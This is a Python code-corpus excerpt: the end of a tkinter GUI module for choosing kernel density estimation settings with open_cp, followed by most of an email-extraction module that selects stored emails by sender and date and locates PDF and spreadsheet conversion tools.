return task
class ScipyKDE():
def __init__(self, main_model):
self.main_model = main_model
@property
def name(self):
return "scipy"
@property
def settings_string(self):
return ""
def to_dict(self):
return {}
def from_dict(self, data):
pass
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.GaussianBaseProvider()
class View(ttk.Frame, BaseKDEView):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["scipy_main"])
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
tooltips.ToolTipYellow(self._plot, _text["kdeplot"])
coords = self.model.main_model.test_coords()
if coords is None:
return
kernel_provider = self.model.make_kernel()
task = self.make_plot_task(kernel_provider, coords)
self._plot.set_figure_task(task)
class NeatestKDE():
def __init__(self, main_model):
self.main_model = main_model
self._k = 15
@property
def name(self):
return "nearest"
@property
def settings_string(self):
return str(self.k)
def to_dict(self):
return {"k" : self.k}
def from_dict(self, data):
self.k = data["k"]
@property
def k(self):
return self._k
@k.setter
def k(self, v):
self._k = int(v)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.GaussianNearestNeighbourProvider(self.k)
class View(ttk.Frame, BaseKDEView):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["nkde_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["nkde_k"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["nkde_k_tt"])
self._k_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._k_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.IntValidator(entry, self._k_value, callback=self._k_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
tooltips.ToolTipYellow(self._plot, _text["kdeplot"])
self.update()
def update(self):
self._k_value.set(self.model.k)
coords = self.model.main_model.test_coords()
if coords is None:
return
kernel_provider = self.model.make_kernel()
task = self.make_plot_task(kernel_provider, coords)
self._plot.set_figure_task(task)
def _k_changed(self):
self.model.k = self._k_value.get()
self.update()
class TrainOnly():
def __init__(self):
pass
@property
def name(self):
return "training dates only"
@property
def settings_string(self):
return ""
def to_dict(self):
return {}
def from_dict(self, data):
pass
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.ConstantTimeKernel()
def select_data_task(self, train_start, train_end):
return self.SelectDataTask(train_start, train_end)
class SelectDataTask():
def __init__(self, train_start, train_end):
self._times = train_start, train_end
def __call__(self, predict_time):
return (*self._times, np.timedelta64(1, "s"))
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_columns(self, [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["to_main"])
class Window():
def __init__(self):
self.days = 30
@property
def name(self):
return "time window"
@property
def settings_string(self):
return "{} days".format(self.days)
def to_dict(self):
return {"days" : self.days}
def from_dict(self, data):
self.days = data["days"]
@property
def days(self):
return self._days
@days.setter
def days(self, value):
self._days = float(value)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.ConstantTimeKernel()
def select_data_task(self, train_start=None, train_end=None):
return self.SelectDataTask(self.days)
class SelectDataTask():
def __init__(self, days_back):
self._days = ( (np.timedelta64(1, "D") / np.timedelta64(1, "s"))
* days_back * np.timedelta64(1, "s") )
def __call__(self, predict_time):
end_time = np.datetime64(predict_time)
start_time = end_time - self._days
return start_time, end_time, np.timedelta64(1, "s")
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["wi_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["wi_days"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["wi_days_tt"])
self._days_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._days_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.FloatValidator(entry, self._days_value, callback=self._days_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._days_value.set(self.model.days)
def task():
fig = mtp.new_figure((6,4))
ax = fig.add_subplot(1,1,1)
x = [0, self.model.days, self.model.days, self.model.days*1.1]
y = [1,1,0,0]
ax.plot(x, y)
ax.set(xlabel=_text["days"], ylabel=_text["int"], xlim=[0, self.model.days*1.1], ylim=[-0.1,1.1])
return fig
self._plot.set_figure_task(task)
def _days_changed(self):
self.model.days = self._days_value.get()
self.update()
class ExpDecay():
def __init__(self):
self.scale = 20
@property
def name(self):
return "exponential decay"
@property
def settings_string(self):
return "{} days".format(self.scale)
def to_dict(self):
return {"scale" : self.scale}
def from_dict(self, data):
self.scale = data["scale"]
@property
def scale(self):
return self._scale
@scale.setter
def scale(self, value):
self._scale = float(value)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.ExponentialTimeKernel(self.scale)
def select_data_task(self, train_start=None, train_end=None):
return self.SelectDataTask(self.scale)
class SelectDataTask():
def __init__(self, scale):
# < 0.1 % of full intensity
self._days = ( (np.timedelta64(1, "D") / np.timedelta64(1, "s"))
* scale * 7 * np.timedelta64(1, "s") )
def __call__(self, predict_time):
end_time = np.datetime64(predict_time)
start_time = end_time - self._days
return start_time, end_time, np.timedelta64(1, "s")
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["ex_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["ex_scale"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["ex_scale_tt"])
self._scale_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._scale_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.FloatValidator(entry, self._scale_value, callback=self._days_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._scale_value.set(self.model.scale)
def task():
fig = mtp.new_figure((6,4))
ax = fig.add_subplot(1,1,1)
x = np.linspace(0, self.model.scale*5, 100)
kernel = self.model.make_kernel()
ax.plot(x, kernel(x))
ax.set(xlabel=_text["days"], ylabel=_text["int"], xlim=[0, self.model.scale*5], ylim=[0,1])
fig.set_tight_layout("tight")
return fig
self._plot.set_figure_task(task)
def _days_changed(self):
self.model.scale = self._scale_value.get()
self.update()
class QuadDecay():
def __init__(self):
self.scale = 20
@property
def name(self):
return "quadratic decay"
@property
def settings_string(self):
return "{} days".format(self.scale)
def to_dict(self):
return {"scale" : self.scale}
def from_dict(self, data):
self.scale = data["scale"]
@property
def scale(self):
return self._scale
@scale.setter
def scale(self, value):
self._scale = float(value)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.QuadDecayTimeKernel(self.scale)
def select_data_task(self, train_start=None, train_end=None):
return self.SelectDataTask(self.scale)
class SelectDataTask():
def __init__(self, scale):
# < 0.1 % of full intensity
self._days = ( (np.timedelta64(1, "D") / np.timedelta64(1, "s"))
* scale * 32 * np.timedelta64(1, "s") )
def __call__(self, predict_time):
end_time = np.datetime64(predict_time)
start_time = end_time - self._days
return start_time, end_time, np.timedelta64(1, "s")
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["qu_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["qu_scale"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["qu_scale_tt"])
self._scale_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._scale_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.FloatValidator(entry, self._scale_value, callback=self._days_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._scale_value.set(self.model.scale)
def task():
fig = mtp.new_figure((6,4))
ax = fig.add_subplot(1,1,1)
x = np.linspace(0, self.model.scale*5, 100)
kernel = self.model.make_kernel()
ax.plot(x, kernel(x))
ax.set(xlabel=_text["days"], ylabel=_text["int"], xlim=[0, self.model.scale*5], ylim=[0,1])
return fig
self._plot.set_figure_task(task)
def _days_changed(self):
self.model.scale = self._scale_value.get()
self.update()
class KDEView(tk.Frame):
def __init__(self, parent, model):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [1], [0])
self._text = richtext.RichText(self, height=12, scroll="v")
self._text.grid(row=0, column=0, sticky=tk.NSEW)
self._text.add_text(_text["main"])
frame = ttk.Frame(self)
self.add_widgets(frame)
frame.grid(row=1, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._update_space()
self._update_time()
def add_widgets(self, frame):
util.stretchy_rows_cols(frame, [1], [0,1])
subframe = ttk.Frame(frame)
subframe.grid(row=0, column=0, sticky=tk.NSEW, padx=1, pady=1)
label = ttk.Label(subframe, text=_text["sk"])
label.grid(row=0, column=0, padx=2)
tooltips.ToolTipYellow(label, _text["sktt"])
self._space_cbox = ttk.Combobox(subframe, height=5, state="readonly", width=40,
values=_text["skernals"])
self._space_cbox.bind("<<ComboboxSelected>>", self._space_changed)
self._space_cbox.grid(row=0, column=1, padx=2)
self._space_frame = ttk.LabelFrame(frame, text=_text["sks"])
self._space_frame.grid(row=1, column=0, sticky=tk.NSEW, padx=1, pady=1)
util.stretchy_rows_cols(self._space_frame, [0], [0])
subframe = ttk.Frame(frame)
subframe.grid(row=0, column=1, sticky=tk.NSEW, padx=1, pady=1)
label = ttk.Label(subframe, text=_text["tk"])
label.grid(row=0, column=0, padx=2)
tooltips.ToolTipYellow(label, _text["tktt"])
self._time_cbox = ttk.Combobox(subframe, height=5, state="readonly", width=40,
values=_text["tchoices"])
self._time_cbox.bind("<<ComboboxSelected>>", self._time_changed)
self._time_cbox.grid(row=0, column=1, padx=2)
self._time_frame = ttk.LabelFrame(frame, text=_text["tks"])
self._time_frame.grid(row=1, column=1, sticky=tk.NSEW, padx=1, pady=1)
util.stretchy_rows_cols(self._time_frame, [0], [0])
def _space_changed(self, event=None):
self.model.space_kernel = int(self._space_cbox.current())
self._update_space()
def _update_space(self):
self._space_cbox.current(self.model.space_kernel.value)
for w in self._space_frame.winfo_children():
w.destroy()
view = self.model.space_kernel_model.make_view(self._space_frame)
view.grid(sticky=tk.NSEW)
def _time_changed(self, event=None):
self.model.time_kernel = int(self._time_cbox.current())
self._update_time()
def _update_time(self):
self._time_cbox.current(self.model.time_kernel.value)
for w in self._time_frame.winfo_children():
w.destroy()
view = self.model.time_kernel_model.make_view(self._time_frame)
view.grid(sticky=tk.NSEW)
def test(root):
ll = KDE(predictor.test_model())
predictor.test_harness(ll, root)
|
StarcoderdataPython
|
3212455
|
<filename>emailextract/core/emailextractor.py
# emailextractor.py
# Copyright 2017 <NAME>
# Licence: See LICENCE (BSD licence)
"""Extract text from emails and save for application specific extraction.
These classes assume text from emails are held in files in a directory, with
no sub-directories, where each file contains a single email.
Each file may start with a 'From ' line, formatted as in mbox mailbox files,
but lines within the email which start 'From ' will only have been changed to
lines starting '>From ' if the email client which accepted delivery of the
email did so. It depends on which mailbox format the email client uses.
"""
# A slightly modified results.core.emailextractor version 2.2, with all the
# stuff specific to the ChessResults application reomoved, is the initial
# version of this module.
import os
from datetime import date
import re
from email import message_from_binary_file
from email.utils import parseaddr, parsedate_tz
from email.message import EmailMessage
import email.header
from time import strftime
import subprocess
import io
import csv
import difflib
import shutil
import tkinter.messagebox
import zipfile
import xml.etree.ElementTree
import base64
try:
import tnefparse
except ImportError: # Not ModuleNotFoundError for Pythons earlier than 3.6
tnefparse = None
try:
import xlsx2csv
except:
xlsx2csv = None
try:
import pdfminer
from pdfminer import pdfinterp, layout, converter
except:
pdfminer = None
# Added when finding out how to use pdfminer3k to extract data from PDF files,
# and how to use xlsx2csv to extract data fron xlsx files.
import sys
from solentware_misc.core.utilities import AppSysDate
# Directory which holds emails one per file copied from email client mailboxes.
# Use imported COLLECTED attribute if available because emailextract expects to
# work with the emailstore package but can work with arbitrary collections of
# emails.
try:
from emailstore.core.emailcollector import COLLECTED
except:
COLLECTED = "collected"
# Python is installed in C: by default on Microsft Windows, so it is deemed
# acceptable to install pdftotext.exe in HOME even though this is done by
# direct copying rather than by an installer. Per user installation is done by
# copying pdftotext.exe to HOMEDRIVE.
if sys.platform != "win32":
_PDFTOTEXT = "pdftotext"
else:
_PDFTOTEXT = "pdftotext.exe"
# xpdf installation notes for Microsoft Windows say 'copy everything to an
# installation directory, e.g. C:/Program Files/Xpdf'.
# Try to choose the 32-bit or 64-bit executable as appropriate.
if sys.maxsize > 2 ** 32:
xpdf = os.path.join("Xpdf", "bin64")
else:
xpdf = os.path.join("Xpdf", "bin32")
if os.path.isfile(
os.path.join(os.environ["USERPROFILE"], xpdf, _PDFTOTEXT)
):
_PDFTOTEXT = os.path.join(os.environ["USERPROFILE"], xpdf, _PDFTOTEXT)
elif os.path.isfile(
os.path.join(os.environ["HOMEDRIVE"], xpdf, _PDFTOTEXT)
):
_PDFTOTEXT = os.path.join(os.environ["HOMEDRIVE"], xpdf, _PDFTOTEXT)
else:
_PDFTOTEXT = None
del xpdf
# ssconvert, a tool supplied with Gnumeric, converts many spreadsheet formats
# to csv files.
# Python provides a module to handle csv files almost trivially.
# In September 2014 it was noticed that gnumeric.org withdrew all pre-built
# binaries of Gnumeric for Microsoft Windows in August 2014, citing crashes
# with profiles suggesting Gtk+ problems and lack of resources to do anything
# about it.
# I had downloaded the pre-built binary for Gnumeric-1-9-16 in March 2010.
# Later versions introduced support for putting each sheet in a separate csv
# file, but I never downloaded a Microsoft Windows binary.
# xls2csv and xlsx2csv were considered as alternatives to ssconvert to do the
# spreadsheet to csv file conversion.
# xls2csv works only on Python 2. I do not know it's capabilities.
# xlsx2csv handles xlsx format only, and it's output is not compatible with the
# output from ssconvert as far as this application is concerned.
# For cross-platform consistency a date format has to be specified to xlsx2csv
# otherwise one may get the raw number representing a date output as text to
# the csv file. ssconvert outputs a date according to the formatting given
# for the cell in the source spreadsheet.
# The workaround is attach csv files created using the spreadsheet application
# to the email.
_SSTOCSV = "ssconvert.exe"
if sys.platform != "win32":
_SSTOCSV = "ssconvert"
else:
# Version directories exist in ../Program Files/Gnumeric for each version
# of Gnumeric installed. Pick one of them, effectively at random, if any
# exist.
# If Gnumeric is not installed, look for xlsx2csv.py in site-packages.
sstocsvdir = os.path.join(os.environ["PROGRAMFILES"], "Gnumeric")
if os.path.isdir(sstocsvdir):
sstocsv = set(os.listdir(sstocsvdir))
else:
sstocsv = None
if sstocsv:
sstocsv = os.path.join(sstocsvdir, sstocsv.pop(), "bin", _SSTOCSV)
if os.path.isfile(sstocsv):
_SSTOCSV = sstocsv
else:
_SSTOCSV = None
else:
_SSTOCSV = None
del sstocsvdir, sstocsv
# _SSTOCSV is left alone so that ssconvert is used if it is available, despite
# the problems cited in August 2014.
_MAIL_STORE = "mailstore"
_EARLIEST_DATE = "earliestdate"
_MOST_RECENT_DATE = "mostrecentdate"
_EMAIL_SENDER = "emailsender"
IGNORE_EMAIL = "ignore"
# The name of the configuration file for extracting text from emails.
EXTRACTED_CONF = "extracted.conf"
# The extract configuration file entry naming the collect configuration file
# for collecting emails from email client mailboxes.
COLLECT_CONF = "collect_conf"
# MEDIA_TYPES directory holds csv files of media types in the format provided
# by https://www.iana.org/assignments/media-types/media-types.xhtml
MEDIA_TYPES = "media_types"
# Directory which holds difference files of text extracted from emails.
EXTRACTED = "extracted"
# Identify a pdf content-type to be included in the extracted data
PDF_CONTENT_TYPE = "pdf_content_type"
# Identify a text content-type to be included in the extracted data
TEXT_CONTENT_TYPE = "text_content_type"
# Identify a spreadsheet content-type to be included in the extracted data
_SS_CONTENT_TYPE = "ss_content_type"
# Identify a comma separated value (csv) content-type to be included in the
# extracted data
CSV_CONTENT_TYPE = "csv_content_type"
# Identify a spreadsheet sheet name or csv file name to be included or
# excluded in the extracted data.
# Probably want to do ss version but maybe not csv, not done for pdf or text.
# Maybe this should be done in application specific configuration too, so
# there is choice about best place to do this.
INCLUDE_CSV_FILE = "include_csv_file"
EXCLUDE_CSV_FILE = "exclude_csv_file"
INCLUDE_SS_FILE_SHEET = "include_ss_file_sheet"
EXCLUDE_SS_FILE_SHEET = "exclude_ss_file_sheet"
# csv files should not contain '\x00' bytes but in practice some do.
# _NUL is used when decoding a csv email attachment to offer the opportunity of
# not processing such csv files.
_NUL = "\x00"
# Identify an Office Open XML word processing content-type to be included in
# the extracted data. Also known as (Microsoft) docx format.
DOCX_CONTENT_TYPE = "docx_content_type"
# Identify an Office Open XML spreadsheet content-type to be included in the
# extracted data. Also known as (Microsoft) xlsx format.
XLSX_CONTENT_TYPE = "xlsx_content_type"
# Identify an Open Office XML word processing content-type to be included in
# the extracted data. Also known as Open Document Format (*.odt).
ODT_CONTENT_TYPE = "odt_content_type"
# Identify an Open Office XML spreadsheet content-type to be included in the
# extracted data. Also known as Open Document Format (*.ods).
ODS_CONTENT_TYPE = "ods_content_type"
# Constants to handle TNEF attachments easily with non-TNEF attachments.
# Non-TNEF can use content-type for attachment directly but TNEF is
# content-type application/ms-tnef and we use the extension to decide. The
# non-TNEF version sets the appropriate constant below.
# _SS is any spreadsheet, so do not set to an extension: cannot use TNEF here.
# TNEF means emails sent by Microsoft Outlook in some circumstances.
_PDF = ".pdf"
_SS = None
_XLSX = ".xlsx"
_ODS = ".ods"
_CSV = ".csv"
_TXT = ".txt"
_DOCX = ".docx"
_ODT = ".odt"
class EmailExtractorError(Exception):
pass
# There are two distinct sets of configuration settings; email selection and
# parsing rules. EmailExtractor will end up a subclass of "Parse" which can be
# shared with EventSeason for text parsing rules.
class EmailExtractor(object):
"""Extract emails matching selection criteria from email client store.
By default look for emails sent or received using the Opera email client
in the most recent twelve months.
"""
email_select_line = re.compile(
"".join(
(
"\A",
"(?:",
"(?:", # whitespace line
"\s*",
")|",
"(?:", # comment line
"\s*#.*",
")|",
"(?:", # parameter line
"\s*(\S+?)\s+([^#]*).*",
")",
")",
"\Z",
)
)
)
replace_value_columns = re.compile("\+|\*")
def __init__(
self,
folder,
configuration=None,
parser=None,
extractemail=None,
parent=None,
):
"""Define the email extraction rules from configuration.
folder - the directory containing the event's data
configuration - the rules for extracting emails
"""
self.configuration = configuration
self.criteria = None
self.email_client = None
self._folder = folder
self.parent = parent
if parser is None:
self._parser = Parser
else:
self._parser = parser
if extractemail is None:
self._extractemail = ExtractEmail
else:
self._extractemail = extractemail
def parse(self):
""" """
self.criteria = None
criteria = self._parser(parent=self.parent).parse(self.configuration)
if criteria:
self.criteria = criteria
return True
if criteria is False:
return False
return True
def _select_emails(self):
""" """
if self.criteria is None:
return
self.email_client = self._extractemail(
eventdirectory=self._folder, **self.criteria
)
return self.email_client.selected_emails
@property
def selected_emails(self):
""" """
if self.email_client:
return self.email_client.selected_emails
return self._select_emails()
@property
def excluded_emails(self):
""" """
if not self.email_client:
if not self._select_emails():
return
return self.email_client.excluded_emails
@property
def eventdirectory(self):
""" """
return self.email_client.eventdirectory
@property
def outputdirectory(self):
""" """
return self.email_client._extracts
def copy_emails(self):
""" """
difference_tags = []
additional = []
for e, em in enumerate(self.selected_emails):
# The interaction between universal newlines and difflib can cause
# problems. In particular when \r is used as a field separator.
# This way such text extracted from an email is readable because
# \r shows up as a special glyph in the tkinter Text widget.
# Later, when processing text, it shows up as a newline (\n).
if tuple(
(s.rstrip("\r\n"), s[-1] in "\r\n")
for s in "\n".join(em.extracted_text).splitlines(True)
) != tuple(
(s.rstrip("\r\n"), s[-1] in "\r\n")
for s in list(difflib.restore(em.edit_differences, 1))
):
difference_tags.append("x".join(("T", str(e))))
if em.difference_file_exists is False:
additional.append(em)
if difference_tags:
return difference_tags, None
elif additional:
w = " emails " if len(additional) > 1 else " email "
if (
tkinter.messagebox.askquestion(
parent=self.parent,
title="Update Extracted Text",
message="".join(
(
"Confirm that text from ",
str(len(additional)),
w,
" be added to version held in database.",
)
),
)
!= tkinter.messagebox.YES
):
return
else:
return None, additional
try:
os.mkdir(os.path.dirname(additional[0].difference_file_path))
except FileExistsError:
pass
for em in additional:
try:
em.write_additional_file()
except FileNotFoundError as exc:
excdir = os.path.basename(os.path.dirname(exc.filename))
tkinter.messagebox.showinfo(
parent=self.parent,
title="Update Extracted Text",
message="".join(
(
"Write additional file to directory\n\n",
os.path.basename(os.path.dirname(exc.filename)),
"\n\nfailed.\n\nHopefully because the directory ",
"does not exist yet: it could have been deleted.",
)
),
)
return
return None, additional
def ignore_email(self, filename):
""" """
if self.email_client.ignore is None:
self.email_client.ignore = set()
self.email_client.ignore.add(filename)
def include_email(self, filename):
""" """
if self.email_client.ignore is None:
self.email_client.ignore = set()
self.email_client.ignore.remove(filename)
class Parser(object):
"""Parse configuration file."""
def __init__(self, parent=None):
self.parent = parent
# Rules for processing conf file
self.keyword_rules = {
_MAIL_STORE: self.assign_value,
_EARLIEST_DATE: self.assign_value,
_MOST_RECENT_DATE: self.assign_value,
_EMAIL_SENDER: self.add_value_to_set,
IGNORE_EMAIL: self.add_value_to_set,
COLLECT_CONF: self.assign_value,
COLLECTED: self.assign_value,
EXTRACTED: self.assign_value,
MEDIA_TYPES: self.assign_value,
PDF_CONTENT_TYPE: self.add_value_to_set,
TEXT_CONTENT_TYPE: self.add_value_to_set,
_SS_CONTENT_TYPE: self.add_value_to_set,
DOCX_CONTENT_TYPE: self.add_value_to_set,
ODT_CONTENT_TYPE: self.add_value_to_set,
XLSX_CONTENT_TYPE: self.add_value_to_set,
ODS_CONTENT_TYPE: self.add_value_to_set,
CSV_CONTENT_TYPE: self.add_value_to_set,
INCLUDE_CSV_FILE: self.add_value_to_set,
EXCLUDE_CSV_FILE: self.add_value_to_set,
INCLUDE_SS_FILE_SHEET: self.add_values_to_dict_of_sets,
EXCLUDE_SS_FILE_SHEET: self.add_values_to_dict_of_sets,
}
def assign_value(self, v, args, args_key):
args[args_key] = v
def add_value_to_set(self, v, args, args_key):
if args_key not in args:
args[args_key] = set()
args[args_key].add(v)
def add_values_to_dict_of_sets(self, v, args, args_key):
sep = v[0]
v = v.split(sep=v[0], maxsplit=2)
if len(v) < 3:
args[args_key].setdefault(v[-1], set())
return
if args_key not in args:
args[args_key] = dict()
args[args_key].setdefault(v[1], set()).update(v[2].split(sep=sep))
def _parse_error_dialogue(self, message):
tkinter.messagebox.showinfo(
parent=self.parent,
title="Configuration File",
message="".join(
(
"Extraction rules are invalid.\n\nFailed rule is:\n\n",
message,
)
),
)
def parse(self, configuration):
args = {}
for line in configuration.split("\n"):
g = EmailExtractor.email_select_line.match(line)
if not g:
self._parse_error_dialogue(line)
return False
key, value = g.groups()
if key is None:
continue
if not value:
self._parse_error_dialogue(line)
return False
args_type = self.keyword_rules.get(key.lower())
if args_type is None:
self._parse_error_dialogue(line)
return False
try:
args_type(value, args, key.lower())
except (re.error, ValueError):
self._parse_error_dialogue(line)
return False
return args
class MessageFile(EmailMessage):
"""Extend EmailMessage class with a method to generate a filename.
The From and Date headers are used.
"""
def generate_filename(self):
"""Return a base filename or None when headers are no available."""
t = parsedate_tz(self.get("Date"))
f = parseaddr(self.get("From"))[-1]
if t and f:
ts = strftime("%Y%m%d%H%M%S", t[:-1])
utc = "".join((format(t[-1] // 3600, "0=+3"), "00"))
return "".join((ts, f, utc, ".mbs"))
else:
return False
class ExtractEmail(object):
"""Extract emails matching selection criteria from email store."""
def __init__(
self,
extracttext=None,
earliestdate=None,
mostrecentdate=None,
emailsender=None,
eventdirectory=None,
ignore=None,
collect_conf=None,
collected=None,
extracted=None,
media_types=None,
pdf_content_type=None,
text_content_type=None,
ss_content_type=None,
csv_content_type=None,
docx_content_type=None,
odt_content_type=None,
xlsx_content_type=None,
ods_content_type=None,
include_csv_file=None,
exclude_csv_file=None,
include_ss_file_sheet=None,
exclude_ss_file_sheet=None,
parent=None,
**soak
):
"""Define the email extraction rules from configuration.
mailstore - the directory containing the email files
earliestdate - emails before this date are ignored
mostrecentdate - emails after this date are ignored
emailsender - iterable of from addressees to select emails
eventdirectory - directory to contain the event's data
ignore - iterable of email filenames to be ignored
schedule - difference file for event schedule
reports - difference file for event result reports
"""
self.parent = parent
if extracttext is None:
self._extracttext = ExtractText
else:
self._extracttext = extracttext
if collect_conf:
try:
cc = open(
os.path.join(eventdirectory, collect_conf), encoding="utf8"
)
try:
for line in cc.readlines():
line = line.split(" ", 1)
if line[0] == COLLECTED:
if len(line) == 2:
from_conf = line[1].strip()
if from_conf:
collected = from_conf
except:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Read Configuration File",
message="".join(
(
"Unable to determine collected directory.\n\n",
"Using name from extract configuration.",
)
),
)
finally:
cc.close()
except:
pass
if collected is None:
ms = COLLECTED
else:
ms = os.path.join(eventdirectory, collected)
self.mailstore = os.path.expanduser(os.path.expandvars(ms))
if extracted is None:
self._extracts = os.path.join(eventdirectory, EXTRACTED)
else:
self._extracts = os.path.join(eventdirectory, extracted)
d = AppSysDate()
if earliestdate is not None:
if d.parse_date(earliestdate) == -1:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Read Configuration File",
message="".join(
(
"Format error in earliest date argument.\n\n",
"Please fix configuration file.",
)
),
)
self.earliestdate = False
else:
self.earliestdate = d.iso_format_date()
else:
self.earliestdate = earliestdate
if mostrecentdate is not None:
if d.parse_date(mostrecentdate) == -1:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Read Configuration File",
message="".join(
(
"Format error in most recent date argument.\n\n",
"Please fix configuration file.",
)
),
)
self.mostrecentdate = False
else:
self.mostrecentdate = d.iso_format_date()
else:
self.mostrecentdate = mostrecentdate
self.emailsender = emailsender
self.eventdirectory = eventdirectory
self.ignore = ignore
self._selected_emails = None
self._selected_emails_text = None
self._text_extracted_from_emails = None
if pdf_content_type:
self.pdf_content_type = pdf_content_type
else:
self.pdf_content_type = frozenset()
if text_content_type:
self.text_content_type = text_content_type
else:
self.text_content_type = frozenset()
if ss_content_type:
self.ss_content_type = ss_content_type
else:
self.ss_content_type = frozenset()
if csv_content_type:
self.csv_content_type = csv_content_type
else:
self.csv_content_type = frozenset()
if docx_content_type:
self.docx_content_type = docx_content_type
else:
self.docx_content_type = frozenset()
if odt_content_type:
self.odt_content_type = odt_content_type
else:
self.odt_content_type = frozenset()
if xlsx_content_type:
self.xlsx_content_type = xlsx_content_type
else:
self.xlsx_content_type = frozenset()
if ods_content_type:
self.ods_content_type = ods_content_type
else:
self.ods_content_type = frozenset()
if include_csv_file is None:
self.include_csv_file = []
else:
self.include_csv_file = include_csv_file
if exclude_csv_file is None:
self.exclude_csv_file = []
else:
self.exclude_csv_file = exclude_csv_file
if include_ss_file_sheet is None:
self.include_ss_file_sheet = []
else:
self.include_ss_file_sheet = include_ss_file_sheet
if exclude_ss_file_sheet is None:
self.exclude_ss_file_sheet = []
else:
self.exclude_ss_file_sheet = exclude_ss_file_sheet
def get_emails(self):
"""Return email files in order stored in mail store.
Each email is stored in a file named:
<self.mailstore>/yyyymmddHHMMSS<sender><utc offset>.mbs
"""
emails = []
if self.earliestdate is not None:
try:
date(*tuple([int(d) for d in self.earliestdate.split("-")]))
except:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Get Emails",
message="".join(
(
"Earliest date format error.\n\n",
"Please fix configuration file.",
)
),
)
return emails
if self.mostrecentdate is not None:
try:
date(*tuple([int(d) for d in self.mostrecentdate.split("-")]))
except:
tkinter.messagebox.showinfo(
parent=self.parent,
title="Get Emails",
message="".join(
(
"Most recent date format error.\n\n",
"Please fix configuration file.",
)
),
)
return emails
try:
ms = self.mailstore
ems = self.emailsender
for a in os.listdir(ms):
if self.ignore:
if a in self.ignore:
continue
if ems:
for e in ems:
if e == a[8 : 8 + len(e)]:
break
else:
continue
emd = "-".join((a[:4], a[4:6], a[6:8]))
if self.earliestdate is not None:
if emd < self.earliestdate:
continue
if self.mostrecentdate is not None:
if emd > self.mostrecentdate:
continue
emails.append(self._extracttext(a, self))
except FileNotFoundError:
emails.clear()
tkinter.messagebox.showinfo(
parent=self.parent,
title="Get Emails",
message="".join(
(
"Attempt to get files in directory\n\n",
str(self.mailstore),
"\n\nfailed.",
)
),
)
emails.sort()
return emails
def _get_emails_for_from_addressees(self):
"""Return selected email files in order stored in mail store.
Emails are selected by 'From Adressee' using the email addresses in
the emailsender argument of ExtractEmail() call.
"""
return [
e
for e in self.get_emails()
if e.is_from_addressee_in_selection(self.emailsender)
]
@property
def selected_emails(self):
""" """
if self._selected_emails is None:
self._selected_emails = self._get_emails_for_from_addressees()
return self._selected_emails
@property
def excluded_emails(self):
""" """
if not self.ignore:
return set()
return set(self.ignore)
class ExtractText(object):
"""Repreresent the stages in processing an email."""
def __init__(self, filename, emailstore):
""" """
self.filename = filename
